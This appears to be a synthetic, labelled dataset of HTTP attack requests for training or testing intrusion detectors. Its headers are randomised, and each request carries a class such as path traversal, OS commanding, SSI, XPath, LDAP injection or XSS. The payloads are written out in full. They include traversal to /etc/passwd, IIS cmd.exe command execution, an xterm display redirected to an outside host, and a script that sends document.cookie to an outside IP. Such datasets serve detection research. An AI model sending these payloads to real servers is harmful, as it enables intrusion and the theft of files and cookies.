GET /nen6aA1nex/tQkDQsuzImOM/UEdShowsitaxn3t5a/ajea8dm.php3?dSso5liodgm7fN=lscript&lhasuaHhl5B=393&euhrabn49ifeNm=eh%29%28++++%7C++++%28tsIg%3D*%29&zdewhotavnin=wt7e&h7uqut=zcxi3pbxj2&OincludeP-af1fZ=48&3gvtEEefse=tasl6sasota&hmMi=13341&2si=ehl&odG6=ew7%3EocoESxwcaIt&siye=div&cQtsthetteed=ii4fsehttpY5e%29aybZoande3 HTTP/1.1
Host: 170.40.98.60
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip, gzip;q=0.2, deflate;q=0.6, identity;q=0.6
Accept-Language: *
Cache-Control: 5its8xr1=Igndhc
Client-ip: 55.184.96.107
Cookie: deey=K 
Cookie2: $Version="78"
Date: Sun, 18 Sep 05 19:26:01 UTC
ETag: W/"fGQbBlOes2k28gT0z"
Expect: 100-continue
From: setrsl@itqn6e.net
If-Modified-Since: Tue, 26 Aug 08 16:16:47 UTC
If-Unmodified-Since: Mon, 12 May 08 23:55:59 UTC
If-Match: *
If-None-Match: ".QGFQF2LNWRy7rpM"
If-Range: "EQj7.sDPguZMgyjTQwb"
Max-Forwards: 95
MIME-Version: 6.5
Pragma: zuT=a
Proxy-Authorization: NTLM b290WWNidHVyZWFtcG85c2hwZXNsZXJhZWV0bmVvMTlvdG4wc2l5ZGM5bGE=
Authorization: Digest nonce
Range: 38889-,402727-278555
Referer: /rierenA/em36/1uLearp/spoetd.asp
TE: deflate;q=0.2,trailers,chunked;q=0.3
Trailer: Authorization
User-Agent: lts1ie (u93UaWOm; r97U.h; u2Tx_@A5M)
UA-CPU: PowerPC
UA-Disp: 3304,573,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: compress
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 519 www.ieWtti.tiff "seRierlduyai" 
X-Forwarded-For: 159.91.4.144
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37245
Start - Id: 36334
class: PathTransversal
GET /mjW5uSP2RDIBO.cfm?tfE=0Qdqq&weOghtesEPsgev=NmrSeufp%25cc&ntllte=sEg9jt5semll9x&Ahttps2PMYQiwoptP=ee0ebody%2Bt%3Fatpassthrud+bin2ise%5C&lwne9t=ttkoa0shqaccess_logiod3nt%3C&ewrtrK1s=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&no1no3umosaes=%7Ead&aa9ycr3=4&childA_w-XWxM=50612397&FHT5a5Tu=iframe%29sandietsfbRie6ui&etetwTgc=mgd-reeslibSchw&tEch7tne=irciehn0tgdDhho HTTP/1.0
Host: 70.199.220.2
Connection: keep-alive
Accept: application/*
Accept-Charset: windows-1254
Accept-Encoding: 
Accept-Language: rnl6o2-iiahrpri;q=0.7, hSo-br, oaaaeN-8uefdZ, cDneR1m-7
Cache-Control: max-age=6
Client-ip: 179.242.140.245
Cookie: tleDraroftytira=?ter;aotMlreXtPi1=nveTcb;RYlogK5jPtX2P=52246655
Cookie2: $Version="6"
Date: Fri, 29 Sep 06 01:21:37 GMT
ETag: W/"vPrR@V7cv9OAFF.ubB"
Expect: 100-continue
From: imeua@eefaielgto.it
If-Modified-Since: Thu, 07 Aug 08 12:20:52 GMT
If-Unmodified-Since: Wed, 04 Aug 04 22:13:08 CET
If-Match: "2brndKdCMduww7PH"
If-None-Match: *
If-Range: ".EK8LPwHe3nrwYsMSq"
Max-Forwards: 5394
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM b2M1YzQ3c3dnTnluYXlicHJuOWxwZHNxYXNpSGVheWlKbmVPYWVoRTI=
Authorization: NTLM Y1dTdm15dERhc3RuZG9udWd4YXJzZ3VlM3JUdHd5bmxvbno=
Range: 94941-674,-88804,1546-98301
Referer: /tpao.tar
TE: trailers
Trailer: User-Agent
User-Agent: bY@JGa http://www.eemo.it
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 625x983
Via: 4.1 186.205.232.76:24, 7.7 www.dn6fiO3.png
Transfer-Encoding: gzip
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 187 www.erlho.html "TnrEu" "Thu, 07 Sep 06 16:36:18 GMT"
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36334
Start - Id: 44258
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.omhihi.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress, deflate, deflate
Accept-Language: cosx-e, bo7sl-s1nw;q=0.0, alh-eyiqe;q=0.7
Cache-Control: no-cache
Client-ip: 225.50.172.247
Cookie: CHb@5TT=?Ajtmp;yfe=~;dre9msfyheht=access_loghttpHaefadunionntqdh
Cookie2: $Version="0"
Date: Tue, 18 May 04 17:42:24 GMT
ETag: "HzqQFUqehcIoGlGbs_6"
Expect: ohder2=drntNg
From: ided@udhoes.uk
If-Modified-Since: Mon, 02 Apr 07 08:45:47 UTC
If-Unmodified-Since: Sat, 24 Jan 09 23:48:29 UTC
If-Match: *
If-None-Match: *
If-Range: "lzLhUagNQisyk3rR7D0u"
Max-Forwards: 5107
MIME-Version: 9.1
Pragma: 0nhxnu=nnOh
Proxy-Authorization: YOigog n4on=aery00e
Authorization: Digest nonce
Range: 9644-,6569-1848
Referer: http://www.rtiOeooy.de/edod/aecliaii.bin
TE: gzip
Trailer: Accept-Language
User-Agent: Mozilla/5.3 (compatible; Konqueror/8.7; Solaris; aNSaiyrmo; pcdzzi; hlmAtiao9)
UA-CPU: 68000
UA-Disp: 9864,838,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2658x747
Via: HTTP/1.3 55.46.17.190, 1.8 165.175.26.205, FTP/0.6 www.xeee.html:06065
Transfer-Encoding: 4ionne; do8tncuc=nico
Upgrade: hrl/2.7, tuad/2.6, kea/2.0, vowi/4.8
Warning: 225 www.sthE.gif:19 "oyonins" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44258
Start - Id: 45171
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: 120.255.242.151:3
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 49.63.221.221
Cookie: eOssErdweHee2tl=CeINrafoeoe8tos;gsoe8= ]en/oirhveagroup byaddimgcsS
Cookie2: $Version="70"
Date: Sun, 12 Nov 06 15:50:56 GMT
ETag: W/"nusweEuleB7R8Ih"
Expect: hness
From: eeatnnio@srlvirtei.ch
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Tue, 02 Oct 07 19:20:38 CET
If-Match: "Z8k_-yLEt65R8Iq"
If-None-Match: "8sRO4g7qg3tp2K28C"
If-Range: "axLjniKNo@mfU5U"
Max-Forwards: 9
MIME-Version: 7.3
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest nonce
Authorization: ttiwh soogktu=nltw
Range: 551-3881,-846
Referer: /ygf9l/2zrtpaz/tQna.mdb
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/2.9 (Windows; U; Windows NT 3.1; si-aR; rv:6.7.6) Gecko/71284580
UA-CPU: StrongARM
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: HTTP/7.7 www.Tcns.png
Transfer-Encoding: identity
Upgrade: iis5w/2.9, 8fLc/3.7, wahe/2.1, ossrxy/5.0
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45171
Start - Id: 44052
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.1
Host: 61.133.115.97
Connection: keep-alive
Accept: application/*, text/*;q=0.7
Accept-Charset: x-mac-arabic, utf-7;q=0.3, windows-874, koi8, iso-8859-2;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: drhb3oa-e
Cache-Control: no-transform
Client-ip: 11.19.174.55
Cookie: vFqw9bhtpassdCo=vfH(;x6zu9=2;zhomeG.xterm9.p=: J
Cookie2: $Version="43"
Date: Sun, 10 Dec 06 01:20:05 UTC
ETag: "KHyP8aOEWUQj0XgwGKg-"
Expect: 100-continue
From: 2eEemxwf@fedDctiae.gov
If-Modified-Since: Thu, 06 Jan 05 22:06:07 CET
If-Unmodified-Since: Tue, 27 Jan 04 20:34:39 UTC
If-Match: *
If-None-Match: "c3YryAjjM.ugyelYJ9"
If-Range: Fri, 19 Nov 04 23:56:07 GMT
Max-Forwards: 8
MIME-Version: 2.6
Pragma: eRu='ln'
Proxy-Authorization: Digest response="fEbfBB7c0E29b479e09d8FeF2679E7e3"
Authorization: demilg fkza=h4aLh
Range: -0
Referer: /skfme/Ngiyz/hneookd/miNehm.tiff
TE: trailers,chunked
Trailer: Range
User-Agent: terecsru (dno2xO.; eSpN6hc_; bH2WpBwGwm; nvt5Dq8rn; ls01VH)
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: Ns2o/9.0 www.ehytg.gif, 7.6 www.osdaseug.htm:8, eawh/7.2 220.225.20.98
Transfer-Encoding: 8ehus
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 003 www.easrIe.js "dEiywrccwaehsomosn" "Sun, 28 Mar 04 08:37:49 UTC"
X-Forwarded-For: 201.145.60.10
X-Serial-Number: 204643043550
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44052
Start - Id: 40431
class: SSI
POST /n2ggvrvernbonadsx/3BFVQkU_dys74t1C/uaOcfp6U5F-dqS/ogEzhnebooixNr9as/tyv8Tre/eu/allz/abGFdbDOKjYWBkPiBJho/nTovvc6rZUzjL93MCi-Q/winnty89A90PEmochaEaW/7ew8tfieeq5ayd4O3.mspx? HTTP/1.0
Content-Length: 136
Content-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sun, 11 Feb 07 04:00:48 GMT
Host: www.niiatk.net:80
Connection: siho6
Accept: application/*;q=0.1
Accept-Charset: iso-10646-ucs-2;q=0.7, euc-jp;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: ge=o3bukei
Date: Sat, 24 Jun 06 07:22:12 UTC
If-Modified-Since: Wed, 05 Nov 08 19:23:11 CET
If-None-Match: *
Referer: /rberR/vfer.mspx
User-Agent: Mozilla/0.3 (Windows; U; WinNT 4.8; rn-eh; rv:4.6.7) Gecko/64744065
Transfer-Encoding: deflate

delete_zvbscriptBT=613559&ewNidn3n5on=<!-- #include   virtual="d:\windows\autoexec.bat"-->&t2u=7743028&yhsonsef2=973

End - Id: 40431
Start - Id: 43273
class: OsCommanding
GET /dryftsRedltiswintame/t5uieisgidoogvNovret.cfm?oG__=pBUElXgQQ&zwO6oeiNpfekgne=273&fGit3reseYsri=ib0&ere=n&ty3esftjui=40459&epIS=y8liu&zsioa3Le=re0e%25rsiq2%27&neXwineeru1o=3cz+t&esrftr2ttodfd=riadgnw6pscw&ieydda2slnbAoh=hiah%25%2Fr+tse5&S6=ccnens&tgeea=3257193&6omTeoel=sirlrffio&efeuTgaj=%250A++xterm++++-display+++++www.onstisarto.com%3A0.0&u2tiTbu1=healniTosite HTTP/1.0
Host: 138.3.78.165:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-4;q=0.9
Accept-Encoding: *
Accept-Language: ogoiulur-aetdl4rb, oeikaur-1y;q=0.8
Cache-Control: no-cache
Client-ip: 210.204.132.70
Cookie: eg=8i;meta7CA=i-HF;iOsystem7Vm=wntdo5&9e;emleygdrcnRt=67258735;lrt=wftphopens;guetaoasns7=uhsfni0ct
Cookie2: $Version="4"
Date: Fri, 21 Sep 07 05:55:36 CET
ETag: "PEioMFbnQm-_spjg_"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: heEwPmnx@hafimu3.ch
If-Modified-Since: Fri, 29 Dec 06 10:11:55 CET
If-Unmodified-Since: Sat, 12 Mar 05 19:13:53 CET
If-Match: *
If-None-Match: "i6IRoZvzAP90gAs3PG"
If-Range: *
Max-Forwards: 4038
MIME-Version: 9.7
Pragma: j='eereeA'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Digest opaque="letle"
Range: 6444-90250,-039,9-0896
Referer: http://www.ateielet.de/nhttE7/mHsTyila/qeshrp.mspx
TE: trailers,trailers,chunked;q=0.1
Trailer: Accept
User-Agent: xcpi/5.2.5.6
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 478x271
Via: 7.9 www.zm0t.tiff:79
Transfer-Encoding: compress
Upgrade: tbvt2/4.8, iobdph/8.7, ciose/9.7
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 5980220981423198
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43273
Start - Id: 48691
class: XPathInjection
PUT /hGJ/t4JyoCxp9X2NqQQXb/na8SPyi_pxBza4/sonAstt/X67Lh1RMx/agdeehesoB/tretaenrtQh/yttsDiSceialttx/itCPVClQZUQsm-JjeZ/o4IVfiUmNjKEjEB/baC@RuQmkK.jpeg? HTTP/1.1
Content-Length: 390
Content-Language: 0gr2wa,gnoho,eresm
Content-Encoding: deflate
Content-Location: http://Oeicoe.be/sEmeoe/d4dsWSn.cfm
Content-MD5: RGl2YXppa21zbnlhT3Nzbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 10:09:36 CET
Last-Modified: Sun, 14 Aug 05 01:13:46 UTC
Host: www.ggrti.fr
Connection: ntaewls
Accept: */*
Accept-Charset: gb2312
Accept-Encoding: gzip, identity, deflate;q=0.6, identity
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 53.40.104.156
Cookie: ewAntotwc=athetnwd
Cookie2: $Version="590"
Date: Wed, 20 Sep 06 24:30:27 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oIwoedct
From: Etql@sttawT.de
If-Modified-Since: Tue, 27 Dec 05 08:50:23 GMT
If-Unmodified-Since: Sat, 24 Mar 07 12:52:43 CET
If-Match: *
If-None-Match: "dM7Chkcs3tfp6l6SM"
If-Range: Wed, 04 Apr 07 02:23:50 UTC
Max-Forwards: 640
Pragma: no-cache
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: Basic SXR2dTp1bkljZGE=
Referer: http://c8nslvv.gov/goanmar/heirgma4/HaeuLi/eNaav1.cgi
TE: gzip,trailers,trailers
Trailer: Accept
User-Agent: odpenot05Cm2atbsrhu
UA-Disp: 5095,3013,8
UA-Color: color16
UA-Pixels: 640x9904
Via: HTTP/0.0 103.167.214.94, HTTP/2.6 www.aninteN.html, 7.3 85.137.81.24:732
Transfer-Encoding: gzip
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
X-Serial-Number: 3185085450816900238
----: ------------------------

se7ry2cSC2drnv=b&ekn=ecati&05nnde8e=tar&freagTdoTy=zttnodtaZbsmsfld&owoeuoleid=9541924&at3dk7deic=k/c/i/child::node()[   position()=935]  |  0ooTe/oNi/hh/child::text()[position()=328]  or     'eaz'   = '&t0nxpi7=762936&4pGoSmwE1frL=o@odvn&tCostBWMHexecW=987765&CvOure=32003624&nrnvaifeutYdf=346703&hi2mdMeExrS=lAA&ineon=aiienrs5of

End - Id: 48691
Start - Id: 46231
class: PathTransversal
GET /Bib.2qggroup by70kZp/efhbaueia0elab/-vbscriptIXBemail3/oxrIndi0edahnn/e0BqYSP/whrae7h/s2Ctgy/eoNk4BxVdWv8WseJP/lt/itXXhUZv-S3h1-_/hW@-N4dr1/r3HUl-jC8.exe?2group byidJ8ANJ.=Arsa0e0ronlr2sog&IUegyq0A=52242377&d2psoaeeuszoy=7269949&mcnoAagotAe=echoiueohengs&nuwkhjewrgan=6734643&hiol=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&rtHneala=2&slimasein1stIb=eDWdbzZR_ub0 HTTP/1.0
Host: 167.3.4.82:80
Connection: tatb
Accept: */*
Accept-Charset: windows-1254;q=0.7, windows-1258
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 239.42.171.202
Cookie: weseoiiwfzcua=35122
Cookie2: $Version="42"
Date: Thu, 19 Aug 04 08:01:47 CET
ETag: "yc9wTp277f0YoEdYK"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Wed, 21 May 08 17:48:31 UTC
If-Unmodified-Since: Mon, 24 Sep 07 09:24:24 CET
If-Match: "v.xnbf0VsVMgtCpd7Pvh"
If-None-Match: "sfVc1tpHw8kkgLGk"
If-Range: Sun, 22 Jun 08 23:13:17 GMT
Max-Forwards: 5402
MIME-Version: 1.9
Pragma: b6pnehMq='yceaeu'
Proxy-Authorization: sczoan Qaahstc=tldthrl
Authorization: NTLM aWlvNG5lYXJzMmlvZGl0bmNsdXRhbWFIdTFpYWlwYW1vZWJlYWRuMG5kczg=
Range: 173-
Referer: /at9r/1ytezoc/euotlqi/3Ednnsl.pl
TE: chunked,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.2 (Machintosh; U; Mac OS X 6.5; te-uv; rv:9.9.5) Gecko/34086150
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6581x3968
Via: 5.6 www.bnmsnhnr.html, 9.5 132.128.219.85:709, FTP/0.0 www.deorWbS.js
Transfer-Encoding: gzip
Upgrade: Sdb/4.1
Warning: 235 www.tpm0.css "YcngsoigutaasdemifSa" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46231
Start - Id: 44906
class: PathTransversal
GET /hiMFMlJ1I9kcCrBRwSCJ/ntablcu2Onnsiend7/4syuWg_1O2Tury_5cf/iwb.o6P9tbfOA2/r0i9ecswncyhiseh/retscna/xq9/llidrsecHukI/4VEoboot.iniYV.js?5snm=e3GbF97z&boenitsv4lr=00508&zlKrfrhaa=7&0a4unXs4fet=..%2F..%2F..%2Fenenll%2Fadmin.txt&cson7ht=289&toobNbd7=r%25u9s&temsbqtrsii=a%2Feg%3Fkr&.K7fog4J=0602432324&nol7aheact=edtt5ftttcesiy HTTP/1.1
Host: www.t8qnbaaFyE.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=128
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="2"
Date: Wed, 02 Jun 04 17:25:47 UTC
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Thu, 02 Dec 04 19:06:03 UTC
If-Unmodified-Since: Fri, 13 Feb 04 24:06:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1209
MIME-Version: 1.5
Pragma: 0=otq
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Basic aDdmQTpvdWFlb3Aw
Range: 50635-77
Referer: http://1ekvoi.fr/s3x1i5/ozasebrm.tiff
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: iIneiuaoa/7.6.7
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6797x3315
Via: 3.6 118.2.60.187
Transfer-Encoding: identity
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 869 www.1pnokeh.shtml "gycoaahndt1t" 
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44906
Start - Id: 46684
class: XSS
GET /i9gCH@Y1Zw7/iVU-5YaeXtYC/hecmiEngeOelidsoeau/cXwFigbC-j.Pa/jvdVadminkiRWhDorIx/jhatuodjtahyfrtiapL/zailt.png?ntniAhOlcynoeo=8875936&hboewittitacp=03LCGi.RwDjI&alteen=sde43mmiaiO%3CHeo HTTP/1.0
Host: www.os6eg.it
Connection: keep-alive
Accept: text/*;q=0.8
Accept-Charset: x-mac-ce, x-mac-korean;q=0.6, koi8-r, x-mac-roman, windows-1252;q=0.4
Accept-Encoding: compress;q=0.0, identity;q=0.5, compress, identity;q=0.9
Accept-Language: ia7-td;q=0.2, 8i-3oahi8, Oya1yi-2F, ifak-sln;q=0.6
Cache-Control: 1rmn4='WEhe'
Client-ip: 150.94.123.100
Cookie: lsoIsclisen=o8$;CZallz3EL=<img     src   = "  javascript:[window.open('http://160.195.32.230/rema.mdb'+document.cookie);]   "   >
Cookie2: $Version="92"
Date: Mon, 29 Sep 08 04:53:55 GMT
ETag: W/"PoOlOy_dU_0Z-cj63_GD"
Expect: 100-continue
From: ekionh@nouustph.biz
If-Modified-Since: Tue, 07 Jun 05 01:56:32 UTC
If-Unmodified-Since: Sat, 20 Oct 07 03:55:42 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Aug 05 10:38:32 GMT
Max-Forwards: 03
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Basic bmxobm5pOnJyMjRSTw==
Authorization: Digest cnonce="eydbiH"
Range: 88653-1260,8019-4754,415-
Referer: http://pctEeb.net/oh0Dlih/i3el/plhe/3rdl.cfm
TE: trailers
Trailer: If-None-Match
User-Agent: rneTTh
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 789x227
Via: 4.1 144.127.219.247, 1.8 46.114.93.205:42
Transfer-Encoding: compress
Upgrade: NNutal/3.3, Zdxhh/3.9
Warning: 142 198.194.142.50 "nwxrb2ahoh62t06" 
X-Forwarded-For: 36.143.183.170
X-Serial-Number: 673414445
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46684
Start - Id: 37087
class: LdapInjection
GET /ltEildyhob5eb/ifhokeabwWv/DLi_Cechoadmin.jsp?hJeksnsilkn=r3O%40f&nusno=796&enahpaw5a6=eHEd&ryE=vwwh&tssnigaohtA=%29+++%28++++%7C++++%28displayName%3Dhad*%29+%28name+++%3D++++had*%29%28+++mail%3Dhad*++%29&iis=ijAHG HTTP/1.0
Host: www.thr8.st
Connection: close
Accept: text/*;q=0.0, text/plain
Accept-Charset: iso-8859-6;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: Eoihr-a;q=0.3, e-pytteme, Ewtamtra-i9;q=0.6, fsacyrC-w1;q=0.1, etue4Inr-aa;q=0.0
Cache-Control: min-fresh=04588
Client-ip: 237.22.129.42
Cookie: wrc=0d|h5intteasystemusipassthru7;oghaatie7bo=u_Q0cOC;ekcqxwyXFa6x=9Rhpw6iSowh/ngeayr
Cookie2: $Version="90"
Date: Tue, 13 Jan 04 11:08:07 GMT
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: 100-continue
From: 0res@4luu6h.st
If-Modified-Since: Wed, 28 Sep 05 09:23:58 GMT
If-Unmodified-Since: Wed, 14 May 08 09:03:00 UTC
If-Match: *
If-None-Match: *
If-Range: "ZtapEphV2gNgqeiD3C"
Max-Forwards: 9010
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM Mkxybmxvb2RsaWxzbm1uSWlzTWRhcHR0dHJna2FoNm8=
Authorization: Basic MmFnY2FlOmR0ZVNpZDhh
Range: 145-
Referer: http://www.b3aedhn.de/hInz5rr.css
TE: trailers,chunked
Trailer: Connection
User-Agent: 1yOuses/7.7
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7857x018
Via: HTTP/2.4 www.9nee.js
Transfer-Encoding: deflate
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 997 www.raeb.htm "tslwaeaovnN5em24i" "Fri, 27 Jan 06 03:45:51 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 252851
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37087
Start - Id: 44484
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.1
Host: www.isy866.cz
Connection: close
Accept: */*
Accept-Charset: windows-1254;q=0.9, euc-kr, cp-932, x-mac-icelandic
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 29.10.71.191
Cookie: epevdnh6Litaerv=dvTdcWBzD;Scruoooo=stoSoaehae1;deTce252ako=oteincludeluRtd0dee>tChmo6
Cookie2: $Version="960"
Date: Wed, 12 Jan 05 22:22:55 UTC
ETag: "lWutw3dUakC8F5kuzGa"
Expect: 2aeIy=nrtO
From: cI4oaebh@nrntt4iEtl.fr
If-Modified-Since: Sat, 17 Sep 05 02:12:35 CET
If-Unmodified-Since: Mon, 07 Nov 05 15:48:12 CET
If-Match: "J5ri1b0XTElPXyi5"
If-None-Match: "k6l2PoLg45XvUvT"
If-Range: Thu, 05 Jan 06 06:45:25 UTC
Max-Forwards: 056
MIME-Version: 9.7
Pragma: est01a=r
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Digest qop=auth-int
Range: 83215-
Referer: /n9ft3i/ob6naeui/reataas/tejTqnps/to5i.nsf
TE: gzip,trailers
Trailer: Via
User-Agent: eeni/8.2.6.8
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 949x9593
Via: 9.5 www.ahbdsyg.jpeg, FTP/8.3 www.cgge1.css, HTTP/7.7 209.179.94.120
Transfer-Encoding: compress
Upgrade: et3/3.3, etd8ae/9.5
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44484
Start - Id: 46260
class: PathTransversal
GET /rh-G_kLVMmb-x/oL5x/iC_zlqXNCf/zKhtpassKG@/p5ahr/yGzdoQO/bFgszIJ19@4/w7w9/uthrrtwmttongrh/aom.bin?sER=730859&WJBcFHB=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&naifttokDq5=198&niaole84=lLq&iea=ySeo5YPRoIWd&e6dstrann=7854920&ieegsioxereiot=mttis&Nn23rhbqu6=%29aenl HTTP/1.1
Host: 162.237.244.169:80
Connection: greoct
Accept: application/zip, audio/x-wav;q=0.2, text/xml
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=41
Client-ip: 190.79.101.95
Cookie: l6oOue=lnK6E
Cookie2: $Version="03"
Date: Wed, 27 Oct 04 14:44:04 UTC
ETag: "VNc9YS_adiG6@ph7"
Expect: lbdrls=ACfiR
From: o8nret@EbsFqo4s.st
If-Modified-Since: Thu, 19 Oct 06 21:49:57 UTC
If-Unmodified-Since: Sat, 12 Feb 05 22:45:52 CET
If-Match: "4s--AhePdq.w6wfKe"
If-None-Match: "sLmj3ROUKuDqC0iagaJ"
If-Range: *
Max-Forwards: 450
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM eXJRM2xlZHJodDRlMmtnN3dyYWV0ZWd1YWVxaWFFdmcxZWVlb2xpc2Fv
Authorization: cibEh 2hct8=naasvou
Range: 5263-
Referer: http://www.e4s9wrb.org/1mdet1L/SehIo/R3hi/iottx/hrspxag.php
TE: gzip,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.2 (X11; U; Unix 6.3; sn-eL; rv:1.0.7) Gecko/51591225
UA-CPU: 68000
UA-Disp: 5467,9007,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: 3.9 193.172.82.226, FTP/4.8 www.ewLfe.tiff, 8atsn/5.9 203.170.2.103
Transfer-Encoding: compress
Upgrade: roeie/1.4
Warning: 196 158.163.201.157 "scotgrnti" "Tue, 25 Mar 08 07:11:27 GMT"
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 1060683
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46260
Start - Id: 48786
